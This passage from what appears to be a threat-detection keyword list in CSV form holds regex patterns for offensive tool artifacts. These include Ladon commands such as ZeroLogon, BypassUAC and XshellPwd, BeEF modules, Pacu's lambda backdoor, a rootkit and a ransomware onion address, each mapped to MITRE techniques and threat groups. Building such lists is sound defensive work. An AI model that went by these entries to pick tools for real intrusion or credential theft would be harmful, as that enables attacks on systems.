T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50764"
"*Ladon wmiexec*",".{0,1000}Ladon\swmiexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50765"
"*Ladon WmiExec2 *",".{0,1000}Ladon\sWmiExec2\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50766"
"*Ladon XshellPwd*",".{0,1000}Ladon\sXshellPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50767"
"*Ladon ZeroLogon*",".{0,1000}Ladon\sZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50768"
"*Ladon40 BypassUAC*",".{0,1000}Ladon40\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50769"
"*Ladon911*.ps1",".{0,1000}Ladon911.{0,1000}\.ps1","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50770"
"*Ladon911.exe*",".{0,1000}Ladon911\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50771"
"*Ladon911_*.rar*",".{0,1000}Ladon911_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50772"
"*LadonExp.exe*",".{0,1000}LadonExp\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50773"
"*LadonGUI.exe*",".{0,1000}LadonGUI\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50774"
"*LadonLib.rar*",".{0,1000}LadonLib\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50775"
"*Ladon-N20.exe*",".{0,1000}Ladon\-N20\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","50776"
"*Ladon-N40.exe*",".{0,1000}Ladon\-N40\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","50777"
"*LadonStudy.exe*",".{0,1000}LadonStudy\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50778"
"*Lalin.sh *",".{0,1000}Lalin\.sh\s.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","0","#linux","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","50779"
"*lallousz-x86@yahoo.com*",".{0,1000}lallousz\-x86\@yahoo\.com.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","#email","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","50780"
"*lambda__backdoor_new_sec_groups*",".{0,1000}lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","50781"
"*lan_fingerprint_common.*",".{0,1000}lan_fingerprint_common\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50782"
"*lan_ping_sweep.json*",".{0,1000}lan_ping_sweep\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50783"
"*lan_sw_port_scan.json*",".{0,1000}lan_sw_port_scan\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","50784"
"*landhb/HideProcess*",".{0,1000}HideProcess.{0,1000}","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","N/A","7","669","117","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z","50785"
"*landxxeaf2hoyl2jvcwuazypt6imcsbmhb7kx3x33yhparvtmkatpaad.onion*",".{0,1000}landxxeaf2hoyl2jvcwuazypt6imcsbmhb7kx3x33yhparvtmkatpaad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50786"
